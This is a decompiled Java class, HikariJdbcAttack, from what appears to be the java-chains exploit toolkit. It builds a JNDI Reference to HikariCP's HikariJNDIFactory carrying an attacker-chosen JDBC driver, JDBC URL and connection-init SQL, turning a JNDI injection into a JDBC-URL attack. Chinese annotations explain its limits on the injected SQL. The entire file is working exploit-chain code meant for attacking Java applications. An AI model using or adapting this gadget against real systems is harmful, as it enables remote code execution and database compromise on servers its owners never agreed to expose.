/*
 * Decompiled with CFR 0.152.
 */
package com.ar3h.chains.gadget.impl.jndi.factory.datasourcefactory;

import com.ar3h.chains.common.ContextTag;
import com.ar3h.chains.common.Gadget;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import com.ar3h.chains.common.exception.ThrowsUtil;
import com.ar3h.chains.common.util.CommonMethod;
import java.util.List;
import java.util.Map;
import javax.naming.Reference;
import javax.naming.StringRefAddr;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;

@GadgetTags(tags={"Reference"}, nextTags={"JdbcUrlChains", "JdbcUrlWithSQLChains"})
@GadgetAnnotation(name="HikariCP \u52a0\u8f7djdbc\uff0c\u8f6c\u4e3ajdbc url\u5229\u7528", description="factory: com.zaxxer.hikari.HikariJNDIFactory\n\u6ce8\u610f\u52a0\u8f7dsql\u65f6\u53ea\u80fd\u52a0\u8f7d\u4e00\u6761\uff0c\u5e76\u4e14sql\u7ed3\u5c3e\u4e0d\u80fd\u6709\u5206\u53f7; https://github.com/vulhub/java-chains/issues/12", dependencies={"hikari"}, authors={"1diot9"}, priority=20)
public class HikariJdbcAttack
implements Gadget {
    private static final Logger log = LoggerFactory.getLogger(HikariJdbcAttack.class);
    private String driverClassName;

    public Reference getObject(String jdbcUrl, String sql) throws Exception {
        Reference ref = new Reference("javax.sql.DataSource", "com.zaxxer.hikari.HikariJNDIFactory", null);
        ref.add(new StringRefAddr("driverClassName", this.driverClassName));
        ref.add(new StringRefAddr("jdbcUrl", jdbcUrl));
        ref.add(new StringRefAddr("initialSize", "1"));
        if (sql != null) {
            if (sql.endsWith(";")) {
                sql = sql.substring(0, sql.length() - 1);
            }
            ref.add(new StringRefAddr("connectionInitSql", sql));
        }
        return ref;
    }

    @Override
    public Object invoke(GadgetContext context, GadgetChain chain) throws Exception {
        Object jdbcObj = chain.doCreate(context);
        this.driverClassName = context.getString(ContextTag.DRIVER_CLASS_NAME_KEY);
        String jdbcUrl = null;
        String sql = null;
        if (jdbcObj instanceof String) {
            jdbcUrl = (String)jdbcObj;
        } else if (jdbcObj instanceof Map) {
            Map jdbcMap = (Map)jdbcObj;
            jdbcUrl = (String)jdbcMap.get(ContextTag.JDBC_URL);
            sql = CommonMethod.handleSql((List)jdbcMap.get(ContextTag.JDBC_URL_SQL_LIST));
        } else {
            ThrowsUtil.throwNotFoundOptionGadgetExceptionNoPrefix("jdbcObj type is error: " + jdbcObj.getClass().getName());
        }
        return this.getObject(jdbcUrl, sql);
    }
}

